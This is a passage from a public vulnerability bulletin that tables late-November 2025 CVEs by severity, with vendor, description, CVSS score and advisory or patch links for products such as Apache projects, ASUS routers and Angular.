| wisc--HTCondor | HTCondor Access Point before 25.3.1 allows an authenticated user to impersonate other users on the local machine by submitting a batch job. This is fixed in 24.12.14, 25.0.3, and 25.3.1. The earliest affected version is 24.7.3. | 2025-11-30 | 4.2 | CVE-2025-66433 | https://htcondor.org/security/vulnerabilities/HTCONDOR-2025-0002.html |
| wpoets--Soundslides | The Soundslides plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the soundslides shortcode in all versions up to, and including, 1.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-27 | 6.4 | CVE-2025-12713 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cdd7e9d1-a580-4b32-9365-7ce17cdc37cd?source=cve https://plugins.trac.wordpress.org/browser/soundslides/tags/1.4.2/soundslide.php#L101 https://plugins.trac.wordpress.org/browser/soundslides/tags/1.4.2/soundslide.php#L102 https://plugins.trac.wordpress.org/browser/soundslides/tags/1.4.2/soundslide.php#L117 https://plugins.trac.wordpress.org/browser/soundslides/tags/1.4.2/soundslide.php#L143 |
| yungifez--Skuul School Management System | A security vulnerability has been detected in yungifez Skuul School Management System up to 2.6.5. This issue affects some unknown processing of the file /user/profile of the component Image Handler. Such manipulation leads to information disclosure. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-30 | 4.3 | CVE-2025-13785 | VDB-333789 | yungifez Skuul School Management System Image profile information disclosure VDB-333789 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #689026 | yungifez Skuul v2.6.5 Exposure of Sensitive Information Through Metadata https://gist.github.com/thezeekhan/02f5255506080849fc732eea07008634 |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| codingWithElias--School Management System | A weakness has been identified in codingWithElias School Management System up to f1ac334bfd89ae9067cc14dea12ec6ff3f078c01. Affected is an unknown function of the file /student-view.php of the component Edit Student Info Page. This manipulation of the argument First Name causes cross site scripting. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be exploited. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. Other parameters might be affected as well. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-30 | 2.4 | CVE-2025-13795 | VDB-333806 | codingWithElias School Management System Edit Student Info student-view.php cross site scripting VDB-333806 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691836 | school-management-system-php web 1 XSS vulnerability https://github.com/Al1ce258/MY-CVE-REPORTS/blob/main/school-management-system.md |
| contao--contao | Contao is an Open Source CMS. From version 4.0.0 to before 4.13.57, before 5.3.42, and before 5.6.5, it is possible to inject code into the template output that will be executed in the browser in the front end and back end. This issue has been patched in versions 4.13.57, 5.3.42, and 5.6.5. A workaround for this issue involves not using the affected templates or patch them manually. | 2025-11-25 | 3.3 | CVE-2025-65961 | https://github.com/contao/contao/security/advisories/GHSA-68q5-78xp-cwwc https://contao.org/en/security-advisories/cross-site-scripting-in-templates |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.2 before 18.4.5, 18.5 before 18.5.3, and 18.6 before 18.6.1 that could have allowed an authenticated user with access to certain logs to obtain sensitive tokens under specific conditions. | 2025-11-26 | 2 | CVE-2025-13611 | GitLab Issue #545947 |
| IBM--Sterling B2B Integrator | IBM Sterling B2B Integrator and IBM Sterling File Gateway 6.0.0.0 through 6.1.2.7 and 6.2.0.0 through 6.2.0.5 and 6.2.1.1 could disclose sensitive information due to a missing or insecure SameSite attribute for a sensitive cookie. | 2025-11-25 | 3.7 | CVE-2025-36134 | https://www.ibm.com/support/pages/node/7252210 |
| KDE--Skanpage | In KDE Skanpage before 25.08.0, an attempt at file overwrite can result in the contents of the new file at the beginning followed by the partial contents of the old file at the end, because of use of QIODevice::ReadWrite instead of QODevice::WriteOnly. | 2025-11-26 | 3.2 | CVE-2025-55174 | https://github.com/KDE/skanpage/tags https://invent.kde.org/utilities/skanpage/-/commit/de3ad2941054a26920e022dc7c4a3dc16c065b5a https://kde.org/info/security/advisory-20250811-1.txt |
| libexpat project--libexpat | In libexpat through 2.7.3, a crafted file with an approximate size of 2 MiB can lead to dozens of seconds of processing time. | 2025-11-28 | 2.9 | CVE-2025-66382 | https://github.com/libexpat/libexpat/issues/1076 |
| MongoDB Inc.--MongoDB Server | A user with access to the cluster with a limited set of privilege actions may be able to terminate queries that are being executed by other users. This may cause a denial of service by preventing a fraction of queries from successfully completing. This issue affects MongoDB Server v7.0 versions prior to 7.0.26 and MongoDB Server v8.0 versions prior to 8.0.14 | 2025-11-25 | 3.1 | CVE-2025-13643 | https://jira.mongodb.org/browse/SERVER-103582 |
| motogadget--mo.lock Ignition Lock | A vulnerability was determined in motogadget mo.lock Ignition Lock up to 20251125. Affected by this vulnerability is an unknown functionality of the component NFC Handler. Executing manipulation can lead to use of hard-coded cryptographic key . The physical device can be targeted for the attack. A high complexity level is associated with this attack. The exploitation appears to be difficult. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-29 | 2 | CVE-2025-6666 | VDB-333785 | motogadget mo.lock Ignition Lock NFC hard-coded key VDB-333785 | CTI Indicators (IOB, IOC, TTP) Submit #701162 | motogadget mo.lock NFC CWE-290, CWE-327, CWE-1394 https://office.dngr.us/s/iZHrwtf2xRPoeJj/download |
| mustangproject--Mustang | Mustang before 2.16.3 allows exfiltrating files via XXE attacks. | 2025-11-28 | 2.8 | CVE-2025-66372 | https://github.com/ZUGFeRD/mustangproject/issues/685 https://github.com/ZUGFeRD/mustangproject/pull/725 https://github.com/ZUGFeRD/mustangproject/releases/tag/core-2.16.3 |
| n/a--Eigenfocus | A security vulnerability has been detected in Eigenfocus up to 1.4.0. This vulnerability affects unknown code of the component Description Handler. The manipulation of the argument entry.description/time_entry.description leads to cross site scripting. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 1.4.1 is able to resolve this issue. The identifier of the patch is 7dec94c9d1f3e513e0ee38ba68caaba628e08582. Upgrading the affected component is advised. | 2025-11-24 | 3.5 | CVE-2025-13584 | VDB-333348 | Eigenfocus Description cross site scripting VDB-333348 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #699689 | Eigenfocus Eigenfocus Free Edition 1.4.0 Cross Site Scripting https://github.com/Stolichnayer/eigenfocus-stored-xss https://github.com/Eigenfocus/eigenfocus/pull/358 https://github.com/Eigenfocus/eigenfocus/commit/7dec94c9d1f3e513e0ee38ba68caaba628e08582 https://github.com/Eigenfocus/eigenfocus/releases/tag/v1.4.1-free |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause a resource to be reused. A successful exploit of this vulnerability might lead to information disclosure. | 2025-11-25 | 3.3 | CVE-2025-33198 | https://nvd.nist.gov/vuln/detail/CVE-2025-33198 https://www.cve.org/CVERecord?id=CVE-2025-33198 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause incorrect control flow behavior. A successful exploit of this vulnerability might lead to data tampering. | 2025-11-25 | 3.2 | CVE-2025-33199 | https://nvd.nist.gov/vuln/detail/CVE-2025-33199 https://www.cve.org/CVERecord?id=CVE-2025-33199 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause a resource to be reused. A successful exploit of this vulnerability might lead to information disclosure. | 2025-11-25 | 2.3 | CVE-2025-33200 | https://nvd.nist.gov/vuln/detail/CVE-2025-33200 https://www.cve.org/CVERecord?id=CVE-2025-33200 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
| PHPGurukul--Hostel Management System | A flaw has been found in PHPGurukul Hostel Management System 2.1. The impacted element is an unknown function of the file /register-complaint.php. Executing manipulation of the argument cdetails can lead to cross site scripting. It is possible to launch the attack remotely. The exploit has been published and may be used. | 2025-11-24 | 3.5 | CVE-2025-13577 | VDB-333341 | PHPGurukul Hostel Management System register-complaint.php cross site scripting VDB-333341 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #698995 | PHPGurukul Hostel Management System 2.1 Stored Cross Site Scripting https://phpgurukul.com/ |
| Splunk--Splunk Add-on for Palo Alto Networks | In Splunk Add-on for Palo Alto Networks versions below 2.0.2, the add-on exposes client secrets in plain text in the _internal index during the addition of new "Data Security Accounts". The vulnerability would require either local access to the log files or administrative access to internal indexes, which by default only the admin role receives. Review roles and capabilities on your instance and restrict internal index access to administrator-level roles. See [Define roles on the Splunk platform with capabilities](https://docs.splunk.com/Documentation/Splunk/latest/Security/Rolesandcapabilities) in the Splunk documentation for more information. | 2025-11-26 | 2.7 | CVE-2025-20373 | https://advisory.splunk.com/advisories/SVD-2025-1105 |
| spotipy-dev--spotipy | Spotipy is a Python library for the Spotify Web API. Prior to version 2.25.2, there is a cross-site scripting (XSS) vulnerability in the OAuth callback server that allows for JavaScript injection through the unsanitized error parameter. Attackers can execute arbitrary JavaScript in the user's browser during OAuth authentication. This issue has been patched in version 2.25.2. | 2025-11-26 | 3.6 | CVE-2025-66040 | https://github.com/spotipy-dev/spotipy/security/advisories/GHSA-r77h-rpp9-w2xm https://github.com/spotipy-dev/spotipy/commit/880b92d7243dcf2b83bf31dc365a858d8b5e6767 |
| VictoriaMetrics--VictoriaMetrics | VictoriaMetrics is a scalable solution for monitoring and managing time series data. In versions from 1.0.0 to before 1.110.23, from 1.111.0 to before 1.122.8, and from 1.123.0 to before 1.129.1, affected versions are vulnerable to DoS attacks because the snappy decoder ignored VictoriaMetrics request size limits allowing malformed blocks to trigger excessive memory use. This could lead to OOM errors and service instability. The fix enforces block-size checks based on MaxRequest limits. This issue has been patched in versions 1.110.23, 1.122.8, and 1.129.1. | 2025-11-25 | 2.7 | CVE-2025-65942 | https://github.com/VictoriaMetrics/VictoriaMetrics/security/advisories/GHSA-66jq-2c23-2xh5 https://github.com/VictoriaMetrics/VictoriaMetrics/commit/51b44afd34d2c9a392d4ebedeeb5b4a7f5beca24 https://github.com/VictoriaMetrics/VictoriaMetrics/releases/tag/v1.110.23 https://github.com/VictoriaMetrics/VictoriaMetrics/releases/tag/v1.122.8 https://github.com/VictoriaMetrics/VictoriaMetrics/releases/tag/v1.129.1 |
| yungifez--Skuul School Management System | A weakness has been identified in yungifez Skuul School Management System up to 2.6.5. This vulnerability affects unknown code of the file /dashboard/schools/1/edit of the component SVG File Handler. This manipulation causes cross site scripting. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-30 | 2.4 | CVE-2025-13784 | VDB-333788 | yungifez Skuul School Management System SVG File edit cross site scripting VDB-333788 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #689012 | yungifez Skuul v2.6.5 Open Redirect https://gist.github.com/thezeekhan/7fc54fd44bc5f318be0350b367b2d8ff |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| ACE SECURITY--WIP-90113 HD Camera | ACE SECURITY WIP-90113 HD cameras contain an unauthenticated configuration disclosure vulnerability in the /web/cgi-bin/hi3510/backup.cgi endpoint. The endpoint permits remote download of a compressed configuration backup without requiring authentication or authorization. The exposed backup may include administrative credentials and other sensitive device settings, enabling an unauthenticated remote attacker to obtain information that could facilitate further compromise of the camera or connected network. | 2025-11-26 | not yet calculated | CVE-2020-36874 | https://packetstorm.news/files/id/156497/ https://cxsecurity.com/issue/WLB-2020020137 https://acesecurity.jp/support/top/wip_series/wip-90113 https://www.vulncheck.com/advisories/ace-security-wip90113-unauthenticated-config-disclosure |
| anchore--grype | Grype is a vulnerability scanner for container images and filesystems. A credential disclosure vulnerability was found in Grype, affecting versions 0.68.0 through 0.104.0. If registry credentials are defined and the output of grype is written using the --file or --output json=<file> option, the registry credentials will be included unsanitized in the output file. This issue has been patched in version 0.104.1. Users running affected versions of grype can work around this vulnerability by redirecting stdout to a file instead of using the --file or --output options. | 2025-11-25 | not yet calculated | CVE-2025-65965 | https://github.com/anchore/grype/security/advisories/GHSA-6gxw-85q2-q646 https://github.com/anchore/grype/pull/3068 https://github.com/anchore/grype/commit/39f7fa17af2739cafe9b27176d4a68f7c05f21c1 |
| angular--angular | Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to versions 19.2.16, 20.3.14, and 21.0.1, there is a XSRF token leakage via protocol-relative URLs in angular HTTP clients. The vulnerability is a Credential Leak by App Logic that leads to the unauthorized disclosure of the Cross-Site Request Forgery (XSRF) token to an attacker-controlled domain. Angular's HttpClient has a built-in XSRF protection mechanism that works by checking if a request URL starts with a protocol (http:// or https://) to determine if it is cross-origin. If the URL starts with protocol-relative URL (//), it is incorrectly treated as a same-origin request, and the XSRF token is automatically added to the X-XSRF-TOKEN header. This issue has been patched in versions 19.2.16, 20.3.14, and 21.0.1. A workaround for this issue involves avoiding using protocol-relative URLs (URLs starting with //) in HttpClient requests. All backend communication URLs should be hardcoded as relative paths (starting with a single /) or fully qualified, trusted absolute URLs. | 2025-11-26 | not yet calculated | CVE-2025-66035 | https://github.com/angular/angular/security/advisories/GHSA-58c5-g7wp-6w37 https://github.com/angular/angular/commit/0276479e7d0e280e0f8d26fa567d3b7aa97a516f https://github.com/angular/angular/commit/05fe6686a97fa0bcd3cf157805b3612033f975bc https://github.com/angular/angular/commit/3240d856d942727372a705252f7c8c115394a41e https://github.com/angular/angular/releases/tag/19.2.16 https://github.com/angular/angular/releases/tag/20.3.14 https://github.com/angular/angular/releases/tag/21.0.1 |
| Apache Software Foundation--Apache CloudStack | In Apache CloudStack improper control of generation of code ('Code Injection') vulnerability is found in the following APIs which are accessible only to admins. * quotaTariffCreate * quotaTariffUpdate * createSecondaryStorageSelector * updateSecondaryStorageSelector * updateHost * updateStorage This issue affects Apache CloudStack: from 4.18.0 before 4.20.2, from 4.21.0 before 4.22.0. Users are recommended to upgrade to versions 4.20.2 or 4.22.0, which contain the fix. The fix introduces a new global configuration flag, js.interpretation.enabled, allowing administrators to control the interpretation of JavaScript expressions in these APIs, thereby mitigating the code injection risk. | 2025-11-27 | not yet calculated | CVE-2025-59302 | https://lists.apache.org/thread/kwwsg2j85f1b75o0ht5zbr34d7h66788 |
| Apache Software Foundation--Apache CloudStack | In Apache CloudStack, a gap in access control checks affected the APIs - createNetworkACL - listNetworkACLs - listResourceDetails - listVirtualMachinesUsageHistory - listVolumesUsageHistory While these APIs were accessible only to authorized users, insufficient permission validation meant that users could occasionally access information beyond their intended scope. Users are recommended to upgrade to Apache CloudStack 4.20.2.0 or 4.22.0.0, which fixes the issue. | 2025-11-27 | not yet calculated | CVE-2025-59454 | https://lists.apache.org/thread/0hlklvlwhzsfw39nocmyxb6svjbs9xbc |
| Apache Software Foundation--Apache Druid | Apache Druid's Kerberos authenticator uses a weak fallback secret when the `druid.auth.authenticator.kerberos.cookieSignatureSecret` configuration is not explicitly set. In this case, the secret is generated using `ThreadLocalRandom`, which is not a crypto-graphically secure random number generator. This may allow an attacker to predict or brute force the secret used to sign authentication cookies, potentially enabling token forgery or authentication bypass. Additionally, each process generates its own fallback secret, resulting in inconsistent secrets across nodes. This causes authentication failures in distributed or multi-broker deployments, effectively leading to a incorrectly configured clusters. Users are advised to configure a strong `druid.auth.authenticator.kerberos.cookieSignatureSecret` This issue affects Apache Druid: through 34.0.0. Users are recommended to upgrade to version 35.0.0, which fixes the issue making it mandatory to set `druid.auth.authenticator.kerberos.cookieSignatureSecret` when using the Kerberos authenticator. Services will fail to come up if the secret is not set. | 2025-11-26 | not yet calculated | CVE-2025-59390 | https://lists.apache.org/thread/jwjltllnntgj1sb9wzsjmvwm9f8rlhg8 |
| Apache Software Foundation--Apache Hive | SQL injection vulnerability in Hive Metastore Server (HMS) when processing delete column statistics requests via the Thrift APIs. The vulnerability is only exploitable by trusted/authorized users/applications that are allowed to call directly the Thrift APIs. In most real-world deployments, HMS is accessible to only a handful of applications (e.g., Hiveserver2) thus the vulnerability is not exploitable. Moreover, the vulnerable code cannot be reached when metastore.try.direct.sql property is set to false. This issue affects Apache Hive: from 4.1.0 before 4.2.0. Users are recommended to upgrade to version 4.2.0, which fixes the issue. Users who cannot upgrade directly are encouraged to set metastore.try.direct.sql property to false if the HMS Thrift APIs are exposed to general public. | 2025-11-26 | not yet calculated | CVE-2025-62728 | https://lists.apache.org/thread/yj65dd8dmzgy8p3nv8zy33v8knzg9o7g |
| Apache Software Foundation--Apache Kvrocks | Improper Privilege Management vulnerability in Apache Kvrocks. This issue affects Apache Kvrocks: from v2.9.0 through v2.13.0. Users are recommended to upgrade to version 2.14.0, which fixes the issue. | 2025-11-28 | not yet calculated | CVE-2025-59790 | https://lists.apache.org/thread/dlbz5hmm4ts3npzqnvhofxmqg9w9zt0o |
| Apache Software Foundation--Apache Kvrocks | Reveals plaintext credentials in the MONITOR command vulnerability in Apache Kvrocks. This issue affects Apache Kvrocks: from 1.0.0 through 2.13.0. Users are recommended to upgrade to version 2.14.0, which fixes the issue. | 2025-11-28 | not yet calculated | CVE-2025-59792 | https://lists.apache.org/thread/h2pcvr5p9otc7dnj2dt2nr4b3omghddw |
| Apache Software Foundation--Apache SkyWalking | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Apache SkyWalking. This issue affects Apache SkyWalking: <= 10.2.0. Users are recommended to upgrade to version 10.3.0, which fixes the issue. | 2025-11-27 | not yet calculated | CVE-2025-54057 | https://lists.apache.org/thread/sl2x2tx8y007x0mo746yddx2lvnv9tcr |
| Apache Software Foundation--Apache Syncope | Apache Syncope can be configured to store the user password values in the internal database with AES encryption, though this is not the default option. When AES is configured, the default key value, hard-coded in the source code, is always used. This allows a malicious attacker, once obtained access to the internal database content, to reconstruct the original cleartext password values. This is not affecting encrypted plain attributes, whose values are also stored using AES encryption. Users are recommended to upgrade to version 3.0.15 / 4.0.3, which fix this issue. | 2025-11-24 | not yet calculated | CVE-2025-65998 | https://lists.apache.org/thread/fjh0tb0d1xkbphc5ogdsc348ppz88cts |
| Ashlar-Vellum--Cobalt | An Out-of-Bounds Write vulnerability is present in Ashlar-Vellum Cobalt, Xenon, Argon, Lithium, and Cobalt Share versions 12.6.1204.207 and prior that could allow an attacker to disclose information or execute arbitrary code. | 2025-11-25 | not yet calculated | CVE-2025-65084 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-01 |
| Ashlar-Vellum--Cobalt | A Heap-based Buffer Overflow vulnerability is present in Ashlar-Vellum Cobalt, Xenon, Argon, Lithium, and Cobalt Share versions 12.6.1204.207 and prior that could allow an attacker to disclose information or execute arbitrary code. | 2025-11-25 | not yet calculated | CVE-2025-65085 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-01 |
| Astak--CM-818T3 2.4GHz Wireless Security Surveillance Camera | Astak CM-818T3 2.4GHz wireless security surveillance cameras contain an unauthenticated configuration disclosure vulnerability in the /web/cgi-bin/hi3510/backup.cgi endpoint. The endpoint permits remote download of a compressed configuration backup without requiring authentication or authorization. The exposed backup may include administrative credentials and other sensitive device settings, enabling an unauthenticated remote attacker to obtain information that could facilitate further compromise of the camera or connected network. | 2025-11-26 | not yet calculated | CVE-2020-36873 | https://packetstorm.news/files/id/156532/ https://www.vulncheck.com/advisories/astak-cm818t3-unauthenticated-config-disclosure |
| ASUS--MyASUS | A local privilege escalation vulnerability exists in the restore mechanism of ASUS System Control Interface. It can be triggered when an unprivileged actor copies files without proper validation into protected system paths, potentially leading to arbitrary files being executed as SYSTEM. For more information, please refer to section Security Update for MyASUS in the ASUS Security Advisory. | 2025-11-25 | not yet calculated | CVE-2025-59373 | https://www.asus.com/content/security-advisory/ |
| ASUS--Router | A path traversal vulnerability has been identified in WebDAV, which may allow unauthenticated remote attackers to impact the integrity of the device. Refer to the ' Security Update for ASUS Router Firmware' section on the ASUS Security Advisory for more information. | 2025-11-25 | not yet calculated | CVE-2025-12003 | https://www.asus.com/security-advisory/ |
| ASUS--Router | A stack buffer overflow vulnerability has been identified in certain router models. An authenticated attacker may trigger this vulnerability by sending a crafted request, potentially impacting the availability of the device. Refer to the ' Security Update for ASUS Router Firmware' section on the ASUS Security Advisory for more information. | 2025-11-25 | not yet calculated | CVE-2025-59365 | https://www.asus.com/security-advisory/ |
| ASUS--Router | An authentication-bypass vulnerability exists in AiCloud. This vulnerability can be triggered by an unintended side effect of the Samba functionality, potentially leading to allow execution of specific functions without proper authorization. Refer to the Security Update for ASUS Router Firmware section on the ASUS Security Advisory for more information. | 2025-11-25 | not yet calculated | CVE-2025-59366 | https://www.asus.com/content/security-advisory/ |
| ASUS--Router | An integer underflow vulnerability has been identified in Aicloud. An authenticated attacker may trigger this vulnerability by sending a crafted request, potentially impacting the availability of the device. Refer to the ' Security Update for ASUS Router Firmware' section on the ASUS Security Advisory for more information. | 2025-11-25 | not yet calculated | CVE-2025-59368 | https://www.asus.com/security-advisory/ |
| ASUS--Router | A SQL injection vulnerability has been identified in bwdpi. A remote, authenticated attacker could leverage this vulnerability to potentially execute arbitrary SQL queries, leading to unauthorized data access. Refer to the 'Security Update for ASUS Router Firmware' section on the ASUS Security Advisory for more information. | 2025-11-25 | not yet calculated | CVE-2025-59369 | https://www.asus.com/security-advisory/ |
| ASUS--Router | A command injection vulnerability has been identified in bwdpi. A remote, authenticated attacker could leverage this vulnerability to potentially execute arbitrary commands, leading to the device executing unintended instructions. Refer to the 'Security Update for ASUS Router Firmware' section on the ASUS Security Advisory for more information. | 2025-11-25 | not yet calculated | CVE-2025-59370 | https://www.asus.com/security-advisory/ |
| ASUS--Router | An authentication bypass vulnerability has been identified in the IFTTT integration feature. A remote, authenticated attacker could leverage this vulnerability to potentially gain unauthorized access to the device. This vulnerability does not affect Wi-Fi 7 series models. Refer to the 'Security Update for ASUS Router Firmware' section on the ASUS Security Advisory for more information. | 2025-11-25 | not yet calculated | CVE-2025-59371 | https://www.asus.com/security-advisory/ |
| ASUS--Router | A path traversal vulnerability has been identified in certain router models. A remote, authenticated attacker could exploit this vulnerability to write files outside the intended directory, potentially affecting device integrity. Refer to the 'Security Update for ASUS Router Firmware' section on the ASUS Security Advisory for more information. | 2025-11-25 | not yet calculated | CVE-2025-59372 | https://www.asus.com/security-advisory/ |
| async_mqtt--Redboltz | Use after free in endpoint destructors in Redboltz async_mqtt 10.2.5 allows local users to cause a denial of service via triggering SSL initialization failure that results in incorrect destruction order between io_context and endpoint objects. | 2025-11-24 | not yet calculated | CVE-2025-65503 | https://github.com/redboltz/async_mqtt/issues/436 https://github.com/redboltz/async_mqtt/pull/437 |
| ATISoluciones--CIGES | A sensitive information disclosure vulnerability exists in the error handling component of ATISoluciones CIGES Application version 2.15.6 and earlier. When certain unexpected conditions trigger unhandled exceptions, the application returns detailed error messages and stack traces to the client. This may expose internal filesystem paths, SQL queries, database connection details, or environment configuration data to remote unauthenticated attackers. This issue allows information gathering and reconnaissance but does not enable direct system compromise. | 2025-11-24 | not yet calculated | CVE-2025-13596 | https://www.atisoluciones.com/incidentes-cve |
| Automated Logic--WebCTRL | The Access Control Bypass vulnerability found in ALC WebCTRL and Carrier i-Vu in versions up to and including 8.5 allows a malicious actor to bypass intended access restrictions and expose sensitive information via the web based building automation server. | 2025-11-27 | not yet calculated | CVE-2024-5539 | https://www.corporate.carrier.com/product-security/advisories-resources/ |
| Automated Logic--WebCTRL | The reflective cross-site scripting vulnerability found in ALC WebCTRL and Carrier i-Vu in versions older than 8.0 affects login panels allowing a malicious actor to compromise the client browser . | 2025-11-27 | not yet calculated | CVE-2024-5540 | https://www.corporate.carrier.com/product-security/advisories-resources/ |
| Automated Logic--WebCtrl | A weakness in Automated Logic and Carrier i-Vu Gen5 router on driver version drv_gen5_106-01-2380, allows malformed packets to be sent through BACnet MS/TP network causing the devices to enter a fault state. This fault state requires a manual power cycle to return the device to network visibility. | 2025-11-27 | not yet calculated | CVE-2025-0657 | https://www.corporate.carrier.com/product-security/advisories-resources/ |
| Automated Logic--Zone Controllers | A vulnerability in Automated Logic and Carrier's Zone Controller via BACnet protocol causes the device to crash. The device enters a fault state; after a reset, a second packet can leave it permanently unresponsive until a manual power cycle is performed. | 2025-11-27 | not yet calculated | CVE-2025-0658 | https://https://www.corporate.carrier.com/product-security/advisories-resources/ |
| BACnet Interoperability Test Services, Inc.--BACnet Test Server | BACnet Test Server versions up to and including 1.01 contains a remote denial of service vulnerability in its BACnet/IP BVLC packet handling. The server fails to properly validate the BVLC Length field in incoming UDP BVLC frames on the default BACnet port (47808/udp). A remote unauthenticated attacker can send a malformed BVLC Length value to trigger an access violation and crash the application, resulting in a denial of service. | 2025-11-26 | not yet calculated | CVE-2020-36872 | https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5597.php https://www.exploit-db.com/exploits/48860 https://packetstormsecurity.com/files/159504 https://cxsecurity.com/issue/WLB-2020100045 https://www.bac-test.com/ https://www.vulncheck.com/advisories/bacnet-test-server-malformed-bvlc-length-dos |
| Beijing Star-Net Ruijie Network Technology Co., Ltd.--NBR Series Routers | Ruijie NBR series routers contain an unauthenticated arbitrary file upload vulnerability via /ddi/server/fileupload.php. The endpoint accepts attacker-supplied values in the name and uploadDir parameters and saves the provided multipart file content without adequate validation or sanitization of file type, path, or extension. A remote attacker can upload a crafted PHP file and then access it from the web root, resulting in arbitrary code execution in the context of the web service. Exploitation evidence was observed by the Shadowserver Foundation on 2025-01-14 UTC. | 2025-11-24 | not yet calculated | CVE-2023-7330 | https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml https://cn-sec.com/archives/1995366.html https://www.cnblogs.com/Domren/articles/19093295 https://rfk0z.github.io/posts/Ruijie-NBR-router-fileupload-php-arbitrary-file-upload-vulnerability/ https://www.vulncheck.com/advisories/ruijie-networks-nbr-routers-unauthenticated-arbitrary-file-upload-via-fileuploadphp |
| Bjango--iStats | iStats contains an insecure XPC service that allows local, unprivileged users to escalate their privileges to root via command injection.This issue affects iStats: 7.10.4. | 2025-11-24 | not yet calculated | CVE-2025-11921 | https://fluidattacks.com/advisories/muse https://bjango.com/mac/istatmenus/ https://cdn.istatmenus.app/files/istatmenus7/versions/iStatMenus7.10.6.zip |
| body-parser--body-parser | body-parser 2.2.0 is vulnerable to denial of service due to inefficient handling of URL-encoded bodies with very large numbers of parameters. An attacker can send payloads containing thousands of parameters within the default 100KB request size limit, causing elevated CPU and memory usage. This can lead to service slowdown or partial outages under sustained malicious traffic. This issue is addressed in version 2.2.1. | 2025-11-24 | not yet calculated | CVE-2025-13466 | https://github.com/expressjs/body-parser/security/advisories/GHSA-wqch-xfxh-vrr4 |
| cerebrate-project--Cerebrate | UsersController::edit in Cerebrate before 1.30 allows an authenticated non-privileged user to escalate their privileges (e.g., obtain a higher role such as admin) via the user-edit endpoint by supplying or modifying role_id or organisation_id fields in the edit request. | 2025-11-28 | not yet calculated | CVE-2025-66385 | https://github.com/cerebrate-project/cerebrate/compare/v1.29...v1.30 https://github.com/cerebrate-project/cerebrate/commit/c9bfa90abc85d4a20a9cc2f282959b72bef829bb https://vulnerability.circl.lu/api/vulnerability/gcve-1-2025-0017 |
| classroomio--classroomio | An issue was discovered in classroomio 0.1.13. Student accounts are able to delete courses from the Explore page without any authorization or authentication checks, bypassing the expected admin-only deletion restriction. | 2025-11-26 | not yet calculated | CVE-2025-65669 | http://classroomio.com https://github.com/classroomio/classroomio https://github.com/Rivek619/CVE-2025-65669 |
| classroomio--classroomio | An Insecure Direct Object Reference (IDOR) in classroomio 0.1.13 allows students to access sensitive admin/teacher endpoints by manipulating course IDs in URLs, resulting in unauthorized disclosure of sensitive course, admin, and student data. The leak occurs momentarily before the system reverts to a normal state restricting access. | 2025-11-26 | not yet calculated | CVE-2025-65670 | http://classroomio.com https://github.com/classroomio/classroomio https://github.com/Rivek619/CVE-2025-65670 |
| classroomio--classroomio | Insecure Direct Object Reference (IDOR) in classroomio 0.1.13 allows unauthorized share and invite access to course settings. | 2025-11-26 | not yet calculated | CVE-2025-65672 | http://classroomio.com https://github.com/classroomio/classroomio https://github.com/Rivek619/CVE-2025-65672 |
| classroomio--classroomio | Stored Cross site scripting (XSS) vulnerability in Classroomio LMS 0.1.13 allows authenticated attackers to execute arbitrary code via crafted SVG profile pictures. | 2025-11-26 | not yet calculated | CVE-2025-65675 | http://classroomio.com https://github.com/classroomio/classroomio https://github.com/Rivek619/CVE-2025-65675 |
| classroomio--classroomio | Stored Cross site scripting (XSS) vulnerability in Classroomio LMS 0.1.13 allows authenticated attackers to execute arbitrary code via crafted SVG cover images. | 2025-11-26 | not yet calculated | CVE-2025-65676 | http://classroomio.com https://github.com/classroomio/classroomio https://github.com/Rivek619/CVE-2025-65676 |
| CyberArk--CyberArk Secure Web Sessions Extension | Improper Input Validation vulnerability in CyberArk CyberArk Secure Web Sessions Extension on Chrome, Edge allows Denial of Service when trying to starting new SWS sessions.This issue affects CyberArk Secure Web Sessions Extension: before 2.2.30305. | 2025-11-27 | not yet calculated | CVE-2025-13762 | https://chromewebstore.google.com/detail/cyberark-secure-web-sessi/ohfinlfcbaehgokpmkjcmkgdcbgamgln?hl=en https://microsoftedge.microsoft.com/addons/detail/cyberark-secure-web-sessi/gmfjibhpaliafbemoifjjdkmgaknhohb?hl=en-US |
